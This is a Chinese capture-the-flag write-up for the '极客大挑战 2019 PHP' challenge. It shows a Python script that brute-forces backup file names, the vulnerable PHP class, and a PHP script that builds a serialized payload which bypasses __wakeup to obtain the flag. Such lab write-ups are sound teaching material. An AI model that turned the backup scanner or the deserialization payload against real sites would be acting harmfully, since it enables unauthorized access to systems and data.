[极客大挑战 2019]PHP

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]PHP相关的知识,希望对你有一定的参考价值。

[极客大挑战 2019]php

考点

PHP反序列化

思路

题目提示有一个备份文件的好习惯,所以我们用脚本跑一下试试

# 常见的网站源码备份文件后缀
# tar
# tar.gz
# zip
# rar
# 常见的网站源码备份文件名
# web
# website
# backup
# back
# www
# wwwroot
# temp
import requests

url = "http://fa5574d9-08a0-4542-bdb3-b87a78f78258.node3.buuoj.cn/"

li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
li2 = ['tar', 'tar.gz', 'zip', 'rar']
number = 1
for i in li1:
    for j in li2:
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(r,' ',i,' ',j)

我们发现存在www.zip备份文件,我们下载下来看看,flag.php一看就是假的flag,我们重点关注class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

分析代码逻辑:
password要为100,username要为admin;且需绕过__wakeup函数,在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行;注意到private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见,因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀,字符串长度也包括所加前缀的长度,在php版本大于7.1中我们也可以采用将字段名private和protect换成字段名public来绕过

Payload

<?php
class Name{
	private $username = 'admin';
	private $password = '100';
}

$a = str_replace(":2:", ":3:", (string)(serialize(new Name)));
$a = urlencode(($a));
echo $a;
?>

Payload:O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
在这里插入图片描述

以上是关于[极客大挑战 2019]PHP的主要内容,如果未能解决你的问题,请参考以下文章

BUUOJ [极客大挑战 2019]Secret File

[极客大挑战 2019]PHP

[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag

buu-[极客大挑战 2019]Secret File

极客大挑战2019PHP题目详解

[极客大挑战 2019]Secret File